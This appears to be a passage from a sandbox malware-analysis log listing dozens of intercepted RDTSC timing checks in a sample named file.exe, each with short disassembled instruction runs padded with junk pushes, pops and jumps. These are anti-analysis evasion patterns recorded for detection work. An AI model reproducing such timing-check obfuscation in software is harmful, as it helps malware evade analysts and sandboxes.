Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 132B674 second address: 132B6AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007F1F80D77657h 0x0000000c jmp 00007F1F80D7764Eh 0x00000011 jmp 00007F1F80D7764Eh 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 132B824 second address: 132B82E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F1F81013DA6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 132B985 second address: 132B98A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 132B98A second address: 132B99B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F1F81013DA6h 0x0000000a push edx 0x0000000b pop edx 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 132B99B second address: 132B9A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 132BB34 second address: 132BB41 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jno 00007F1F81013DA6h 0x00000009 pop edx 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 132BC99 second address: 132BC9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 132BC9F second address: 132BCA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 132BCA3 second address: 132BCBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F1F80D77652h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 132BCBF second address: 132BCC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 132BCC3 second address: 132BCC9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 132BCC9 second address: 132BCCE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 132BCCE second address: 132BCD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 132BCD4 second address: 132BCDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 132BCDA second address: 132BCE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 132C4F2 second address: 132C4F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 132C4F8 second address: 132C4FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 132C4FE second address: 132C515 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F1F81013DA6h 0x0000000a popad 0x0000000b pushad 0x0000000c push edi 0x0000000d ja 00007F1F81013DA6h 0x00000013 pop edi 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 132C515 second address: 132C534 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F1F80D77646h 0x0000000a ja 00007F1F80D77646h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jnc 00007F1F80D77646h 0x00000019 je 00007F1F80D77646h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13328A5 second address: 13328A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13322B9 second address: 13322BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13322BF second address: 13322C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13322C5 second address: 13322CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13325E6 second address: 13325F0 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F1F81013DA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 133FA63 second address: 133FA68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 133FA68 second address: 133FA7C instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F1F81013DACh 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 133FA7C second address: 133FA80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 133F5D1 second address: 133F5E4 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F1F81013DA8h 0x00000008 push eax 0x00000009 jng 00007F1F81013DA6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1356897 second address: 13568AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F80D7764Dh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13568AA second address: 13568BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F1F81013DA6h 0x00000009 jl 00007F1F81013DA6h 0x0000000f popad 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1271A72 second address: 1271A92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F1F80D77656h 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1271A92 second address: 1271AA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edi 0x00000007 ja 00007F1F81013DAAh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1271AA3 second address: 1271AA8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 126FFDA second address: 126FFDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 135B803 second address: 135B807 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 135B807 second address: 135B82B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 ja 00007F1F81013DA6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F1F81013DB5h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 135BAF8 second address: 135BB35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jng 00007F1F80D77648h 0x0000000b pop eax 0x0000000c jo 00007F1F80D77675h 0x00000012 jmp 00007F1F80D77653h 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F1F80D7764Ah 0x0000001e jmp 00007F1F80D7764Ah 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 135BC95 second address: 135BC99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 135BC99 second address: 135BCA5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 135BCA5 second address: 135BCB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F1F81013DA6h 0x0000000a pop ebx 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 135C0A7 second address: 135C0AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 135C237 second address: 135C258 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F1F81013DB4h 0x0000000e push edx 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 135C258 second address: 135C270 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1F80D77650h 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 135C270 second address: 135C29F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jmp 00007F1F81013DB2h 0x0000000e popad 0x0000000f pushad 0x00000010 jnc 00007F1F81013DA8h 0x00000016 push eax 0x00000017 push edx 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a jo 00007F1F81013DA6h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 135FCC0 second address: 135FCC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 135FCC4 second address: 135FCCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 135FCCA second address: 135FCD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1362DA2 second address: 1362DB5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F81013DAFh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1362DB5 second address: 1362DC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F1F80D7764Dh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1367C34 second address: 1367C4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1F81013DB7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1367C4F second address: 1367C69 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jo 00007F1F80D77646h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F1F80D7764Bh 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13A5BF4 second address: 13A5C23 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F81013DADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a jmp 00007F1F81013DB5h 0x0000000f pop esi 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 push edx 0x00000014 pop edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13A5A98 second address: 13A5A9E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13A5A9E second address: 13A5AA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13A5AA4 second address: 13A5AA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13A7F4B second address: 13A7F71 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jo 00007F1F81013DA6h 0x00000009 pop edx 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pop edx 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F1F81013DB3h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13B4371 second address: 13B4375 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13B4375 second address: 13B4396 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F1F81013DA6h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F1F81013DB1h 0x00000013 push edx 0x00000014 pop edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13B4396 second address: 13B43A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F80D7764Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13B43A6 second address: 13B43BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F1F81013DAFh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13B43BE second address: 13B43C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13B43C8 second address: 13B43CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13B43CE second address: 13B43D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13B63F6 second address: 13B6406 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F1F81013DAAh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13B6406 second address: 13B6410 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F1F80D7764Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 147A91F second address: 147A923 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 147A923 second address: 147A931 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F1F80D77646h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 147A931 second address: 147A937 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 147A937 second address: 147A93F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 147AD4E second address: 147AD5C instructions: 0x00000000 rdtsc 0x00000002 je 00007F1F81013DA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 147AD5C second address: 147AD60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 147AD60 second address: 147AD70 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 jbe 00007F1F81013DB2h 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 147B052 second address: 147B058 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 147B058 second address: 147B05C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 147B05C second address: 147B068 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 147B068 second address: 147B07A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1F81013DAEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 147B07A second address: 147B07E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 147B07E second address: 147B084 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 147B1FE second address: 147B202 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 147B202 second address: 147B208 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 147DF9A second address: 147DFB0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F80D77652h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 147E2A3 second address: 147E2BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1F81013DB8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 147E2BF second address: 147E2C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 147E2C3 second address: 147E322 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000004h 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007F1F81013DA8h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 00000018h 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 mov edx, dword ptr [ebp+122D1A54h] 0x0000002d xor edx, 5C3E5B09h 0x00000033 mov edx, dword ptr [ebp+122D27BAh] 0x00000039 call 00007F1F81013DA9h 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007F1F81013DB5h 0x00000045 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 147E322 second address: 147E39C instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F1F80D7765Ah 0x00000008 jmp 00007F1F80D77654h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 pushad 0x00000011 jo 00007F1F80D77657h 0x00000017 jmp 00007F1F80D77651h 0x0000001c jmp 00007F1F80D77653h 0x00000021 popad 0x00000022 mov eax, dword ptr [esp+04h] 0x00000026 pushad 0x00000027 jmp 00007F1F80D77659h 0x0000002c push edx 0x0000002d jbe 00007F1F80D77646h 0x00000033 pop edx 0x00000034 popad 0x00000035 mov eax, dword ptr [eax] 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 147E39C second address: 147E3A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 147E3A0 second address: 147E3A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 147E3A4 second address: 147E3AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 147F80F second address: 147F819 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 147F819 second address: 147F82D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 je 00007F1F81013DA6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c je 00007F1F81013DAEh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 147F82D second address: 147F839 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 147F839 second address: 147F83D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 147F83D second address: 147F84D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jnp 00007F1F80D77652h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 147F84D second address: 147F853 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 148159B second address: 148159F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 148159F second address: 14815A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14815A5 second address: 14815AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14815AB second address: 14815C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F81013DB8h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14815C9 second address: 14815CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14815CD second address: 14815E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F81013DB4h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1481151 second address: 1481155 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1481155 second address: 1481159 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
